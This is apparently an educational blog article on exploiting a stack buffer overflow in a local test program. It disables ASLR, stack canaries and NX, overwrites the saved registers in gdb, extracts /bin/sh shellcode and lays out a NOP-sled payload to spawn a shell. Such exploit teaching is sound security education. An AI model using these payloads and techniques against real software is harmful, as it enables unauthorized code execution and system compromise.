Buffer Overflow: Code Execution By Shellcode Injection
By this third article of the Buffer Overflow series we should be familiar with:
- buffer,
- memory segmentation,
- buffer overflow,
- gdb,
- assembly and disassembly
In this article we will detail how to exploit a buffer overflow in order to achieve arbitrary code execution via shellcode injection.
Setting up our environment
As stated in the introduction, the memory layout of a running application has become significantly more complex due to various security measures. These measures make exploiting vulnerabilities such as buffer overflows quite challenging. Common and highly effective ones include:
- ASLR protection (Address Space Layout Randomization) randomly arranges the address space positions of key data areas of a program. At each new execution, the stored data is placed in different memory spaces.
- SSP protection (Stack-Smashing Protector) detects stack buffer overruns by aborting if a secret value on the stack is changed. These secret values ("canaries") are inserted between data segments in the stack. Their integrity is checked, and the program is immediately interrupted if a modification is detected.
- Non-executable stack and heap (NX): these memory areas are intended to contain only variables and pointers, never executable code.
For the learning purpose of our example, we are going to disable these protections and force a 32-bit compilation.
    [hg8@archbook ~]$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR (a plain "sudo echo 0 > ..." fails because the redirection runs without root privileges)
Flags explanation:
-m32: Compile in 32-bit mode.
-g: Generate debug information to be used by the GDB debugger.
-mpreferred-stack-boundary=2: Keep the stack aligned on 4-byte (2^2) boundaries, preventing alignment padding that could make our example confusing.
-fno-stack-protector: Disable the Stack-Smashing Protector.
-z execstack: Disable NX (allowing the stack segment to be executable).
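Before going further, it can be worth confirming that ASLR is really off. The following is a minimal sketch, not part of the original setup: the helper name `describe_aslr` is made up for illustration, and the meaning of the values 0, 1 and 2 follows the Linux kernel sysctl documentation.

```python
from pathlib import Path

# Meaning of each value of randomize_va_space (Linux kernel sysctl docs).
ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, mmap base and VDSO randomized)",
    2: "full (partial mode plus heap randomization)",
}


def describe_aslr(raw: str) -> str:
    """Turn the raw content of randomize_va_space into a readable label."""
    return ASLR_MODES.get(int(raw.strip()), "unknown")


if __name__ == "__main__":
    path = Path("/proc/sys/kernel/randomize_va_space")
    if path.exists():  # the file only exists on Linux
        print("ASLR is", describe_aslr(path.read_text()))
```

For the rest of this article the expected answer is "disabled".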
Overflowing the stack
Let’s now open our program with gdb:
    [hg8@archbook ~]$ gdb ./vuln
In the previous article, the disassembly of our example program allowed us to understand what our program stack will look like:
In order to exploit the buffer overflow in our program, we are going to pass an input longer than 500 characters to our buffer[] variable.
It’s important to note that, even though the stack itself grows downward, from higher to lower memory addresses, the buffer is filled from lower to higher memory addresses.
In our example, when we input a string longer than 500 characters, it starts overwriting the saved register values that sit just after the buffer, at higher memory addresses.
For example, if we use a 501-character input, the following will happen:
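The effect of a 501-character input can be simulated on a toy stack frame. This is only a sketch under assumptions: the three saved values are made-up placeholders, and `simulate_strcpy` is a hypothetical helper that mimics an unchecked copy, including the trailing NUL byte that a C string copy appends.

```python
import struct

BUF_SIZE = 500  # size of buffer[] in the vulnerable program


def simulate_strcpy(frame: bytearray, data: bytes) -> None:
    """Copy data plus a trailing NUL into the frame, with no bounds check."""
    copied = data + b"\x00"
    frame[0:len(copied)] = copied


# Frame layout from low to high addresses:
#   buffer[500] | saved ebx | saved ebp | return address
# The three saved values are placeholders chosen for readability.
frame = bytearray(BUF_SIZE) + struct.pack("<III", 0x11223344, 0x55667788, 0x99AABBCC)

simulate_strcpy(frame, b"A" * 501)

saved_ebx, saved_ebp, ret_addr = struct.unpack_from("<III", frame, BUF_SIZE)
print(hex(saved_ebx))  # low byte is now 0x41, the next byte is the NUL terminator
print(hex(saved_ebp), hex(ret_addr))  # still untouched
```

Only the lowest bytes of the saved ebx value change, because the buffer is filled toward higher addresses and the machine is little endian.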
Let’s now see in practice what happens when we pass a 501-character string to our program.
We can use Python to generate a string made of 501 occurrences of the letter ‘A’ (0x41 is hexadecimal for 65, which is the ASCII code for the letter ‘A’).
From gdb this can be done using the run command:
    [hg8@archbook ~]$ gdb ./vuln
Nothing happens, which is expected since EBX is not a critical register in our example program.
Let’s now add a breakpoint in order to highlight how the saved EBX value got overwritten with an extra 0x41 (‘A’):
    (gdb) disassemble main
Now by checking the registers with the info registers command we can verify that the ebx value is being overwritten.
By inputting a 504-character string, we overwrite the whole ebx register:
    (gdb) run $(python -c "print('\x41'*504)")
We can also visualize what the stack looks like in memory from gdb with x/14x $sp+460. Let’s decompose the command to understand how it works:
x/14x displays 14 units of memory (4-byte words by default) in hexadecimal format.
$sp+460 starts the memory reading from the stack pointer ($sp) position offset by +460, which is around where our saved ebx value is located.
Beforehand, let’s slightly tweak our payload to make it more visible in the stack representation: instead of ‘A’, we will write the 4 overflowed bytes as ‘B’ (0x42):
    (gdb) run $(python -c "print('\x41'*500+'\x42'*4)")
Now let’s overwrite every saved value following our buffer: ebx with ‘BBBB’, ebp with ‘CCCC’ and eip with ‘DDDD’:
    (gdb) run $(python -c "print('\x41'*500+'\x42'*4+'\x43'*4+'\x44'*4)")
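The same marker payload can be built in a small script, which makes the offsets explicit. This is a sketch rather than the article's own tooling; `marker_payload` is a name introduced here for illustration.

```python
BUF_SIZE = 500  # size of buffer[] in the vulnerable program


def marker_payload() -> bytes:
    """Fill the buffer with 'A', then mark saved ebx, saved ebp and the return address."""
    return b"A" * BUF_SIZE + b"B" * 4 + b"C" * 4 + b"D" * 4


payload = marker_payload()
ret_offset = payload.index(b"DDDD")  # where the return address starts
print(len(payload), ret_offset)      # 512 508
```

The return address therefore sits at offset 508, and any payload meant to control it must be 512 bytes long.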
Our stack now looks like this:
We achieved full control of the saved register values adjacent to our buffer. So what can we do with such access? Let’s move on to exploitation.
Exploitation
The last value we managed to overwrite is the saved return address, which ends up in eip.
EIP, the “Extended Instruction Pointer”, holds the address of the next instruction the CPU will execute, so it controls the flow of the program. When the function returns, the return address saved on the stack is loaded into EIP.
This means that if we can place malicious code in the program’s memory, we can use the buffer overflow to overwrite the saved return address so that eip points to the memory address of that code.
And that’s exactly what we are going to do now, and we will start by crafting a shellcode.
Shellcode Creation
First of all, what is a shellcode?
A shellcode is a small piece of code used as payload when exploiting an overflow vulnerability. Historically it’s called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine.
In our case, we will inject a shellcode into our buffer in order to have it get executed later on.
Wikipedia defines the writing of shellcode “as much of an art as it is a science”, since shellcode depends on the operating system, CPU architecture and is commonly written in Assembly.
Plenty of ready-made shellcodes can be found online. For our example we are going to use a very common and simple shellcode for x86 which executes a /bin/sh shell.
Here is a quick overview of this shellcode:
    xor eax, eax ; put 0 into eax
This code can be assembled with nasm into an Executable and Linkable Format (ELF) object file:
    [hg8@archbook ~]$ nasm -f elf shellcode.asm
Now we need to disassemble it in order to get the shellcode bytes:
    [hg8@archbook ~]$ objdump -d -M intel shellcode.o
We can now easily extract the hexadecimal shellcode, either by hand or with some bash-fu:
    [hg8@archbook ~]$ objdump -d ./shellcode.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
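If the shell pipeline feels fragile, the same extraction can be sketched in Python. This assumes the usual tab-separated layout of `objdump -d` output (address, hex bytes, mnemonic). The `SAMPLE` listing is illustrative only and is not the article's actual disassembly, and `shellcode_from_objdump` is a hypothetical helper name.

```python
import re

# An instruction line starts with an address field such as "   0:".
ADDRESS_FIELD = re.compile(r"^\s*[0-9a-f]+:$")


def shellcode_from_objdump(listing: str) -> bytes:
    """Collect the opcode bytes from the text printed by `objdump -d`."""
    out = bytearray()
    for line in listing.splitlines():
        fields = line.split("\t")
        if len(fields) < 2 or not ADDRESS_FIELD.match(fields[0]):
            continue  # headers, labels and blank lines carry no bytes
        out += bytes.fromhex("".join(fields[1].split()))
    return bytes(out)


# Illustrative two-instruction listing, not the real shellcode.
SAMPLE = (
    "00000000 <_start>:\n"
    "   0:\t31 c0                \txor    eax,eax\n"
    "   2:\t50                   \tpush   eax\n"
)

code = shellcode_from_objdump(SAMPLE)
escaped = "".join(f"\\x{b:02x}" for b in code)
print(escaped)  # \x31\xc0\x50
```

In practice the listing would come from running objdump on shellcode.o and passing its standard output to the function.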
Shellcode Testing
Now to be sure our shellcode works, let’s write a simple program to run it on our machine:
Let’s run it:
    [hg8@archbook ~]$ gcc -m32 -z execstack shellcode-loader.c -o shellcode-loader
All is good, let’s now inject the shellcode into our vulnerable program.
Shellcode Injection
We now need to make our vulnerable program execute our shellcode. To do so we will inject the shellcode in the input data payload, for it to be stored in our buffer.
The next step will be to have our return address point to the memory location where our shellcode is stored in order for it to be executed.
Since memory may change a bit during program execution and we don’t know the exact location of our shellcode we will use the NOP-sled technique.
NOP-sled
A NOP sled, also known as a NOP slide, is a technique used to help ensure that a shellcode is executed even if the exact memory location of the exploit payload is not known.
The NOP, or No-Operation, instruction is a machine language instruction that performs no operation and takes up one machine cycle. NOP sled takes advantage of this instruction by creating a sequence of NOP instructions that can serve as a landing pad for the program execution flow.
We will craft a sequence of NOP instructions followed by our shellcode. The idea is that if the execution flow is redirected to any point within the NOP sled, the CPU will execute the NOP instructions and keep moving forward until it hits the shellcode.
When utilizing a NOP-sled, the precise location of the shellcode within the buffer doesn’t matter for the return address to reach it. What we do know is that it will reside somewhere within the buffer, and its length will be 25 bytes.
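The sliding behaviour can be illustrated with a toy model. This is a simulation, not real execution: `landing_point` is a hypothetical helper, the sled length is arbitrary, and the 25 placeholder bytes merely stand in for the shellcode.

```python
NOP = 0x90  # x86 opcode of the NOP instruction


def landing_point(memory: bytes, entry: int) -> int:
    """Skip over NOPs starting at entry and return the index of the first other byte."""
    pc = entry
    while pc < len(memory) and memory[pc] == NOP:
        pc += 1
    return pc


sled_len = 32                      # arbitrary length for the demonstration
placeholder = b"\xcc" * 25         # stands in for the 25-byte shellcode
memory = bytes([NOP]) * sled_len + placeholder

# Whatever the entry point inside the sled, execution reaches the same spot.
landings = {landing_point(memory, entry) for entry in range(sled_len)}
print(landings)  # {32}
```

Every entry point inside the sled ends at the first byte after it, which is why an approximate return address is good enough.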
With a 25-byte shellcode and a 512-byte payload, we have 487 bytes left for the NOP sled and the return address, which we will lay out like so:
Payload: [ NOP SLED] [ SHELLCODE ] [ RETURN ADDRESS ]
Crafting our exploit
We will use a Python script to craft our exploit. Since we use Python 3, it’s important to use the bytes type.
In addition, since we are working on x86, the hexadecimal value of the NOP instruction is 0x90.
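Why the bytes type matters can be seen with the NOP byte itself. The sketch below makes one assumption, namely that the payload is written to standard output: a Python 3 text string containing '\x90' is encoded as two bytes in UTF-8, which would corrupt the payload. The `emit` helper is hypothetical.

```python
import sys

nop_as_text = "\x90".encode("utf-8")  # what printing a str sends on a UTF-8 terminal
nop_as_bytes = b"\x90"                # what the CPU actually needs

print(nop_as_text.hex(), nop_as_bytes.hex())  # c290 90


def emit(payload: bytes) -> None:
    """Write raw bytes to stdout, bypassing any text encoding."""
    sys.stdout.buffer.write(payload)
```

The earlier payloads made only of ‘A’, ‘B’, ‘C’ and ‘D’ were safe to print because ASCII characters are encoded as a single byte.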
    import sys
Since we don’t know yet what the return address (eip) should be, we temporarily replace it with CCCC (four 0x43 bytes), repeated 10 times to have a bit of padding between our shellcode and the rest of the stack.
The NOP instruction is repeated 447 times, since the whole payload must be 512 bytes long to overwrite the return address:
    512 - (4 * 10) - 25 = 447
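The arithmetic above translates directly into a payload layout. This is a sketch of the structure only: the shellcode is replaced by 25 placeholder bytes (the real bytes are whatever the extraction step produced), and the constant names are introduced here for illustration.

```python
PAYLOAD_SIZE = 512   # bytes needed to reach and overwrite the return address
SHELLCODE_LEN = 25   # length of the shellcode used in this article
RET_REPEAT = 10      # number of copies of the 4-byte return address

shellcode = b"\xcc" * SHELLCODE_LEN  # placeholder, NOT the real shellcode
ret = b"C" * 4                       # temporary return address (0x43434343)

nop_count = PAYLOAD_SIZE - len(ret) * RET_REPEAT - len(shellcode)
payload = b"\x90" * nop_count + shellcode + ret * RET_REPEAT

print(nop_count, len(payload))  # 447 512
```

The last four bytes of the payload are the ones that land on the saved return address.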
Here is what we expect our memory to look like after execution of our payload:
Let’s run our payload:
    [hg8@archbook ~]$ gdb ./vuln
We get exactly what we were looking for: a segmentation fault, since we didn’t provide a valid return address yet. Let’s now inspect the memory to determine what the return address should be.
When inspecting the memory, we can see our payload was injected as expected:
Let’s now pick any memory address within the 0x90 NOP sled area before the shellcode to be our return address. From the screenshot above we can pick 0xffffce30 for example.
Since Intel CPUs are little endian, we need to reverse the byte order of the address in our payload.
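Rather than reversing the bytes by hand, the conversion can be left to Python. This is a minimal sketch using the example address picked above; on another machine the address will differ.

```python
import struct

address = 0xFFFFCE30  # example address inside the NOP sled

packed = struct.pack("<I", address)   # "<I" = little-endian unsigned 32-bit
same = address.to_bytes(4, "little")  # equivalent, without the struct module

print(packed.hex())  # 30ceffff
```

The least significant byte (0x30) comes first, which is the order in which the bytes must appear in the payload.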
Our script becomes:
    import sys
If everything goes fine, strcpy will copy our string into the buffer, and when the function returns it will load our injected return address, redirecting execution to the NOP sled and then to the shellcode.
Let’s give it a try:
    [hg8@archbook ~]$ gdb ./vuln
And here we go! The buffer overflow was successfully exploited, giving us access to a command shell.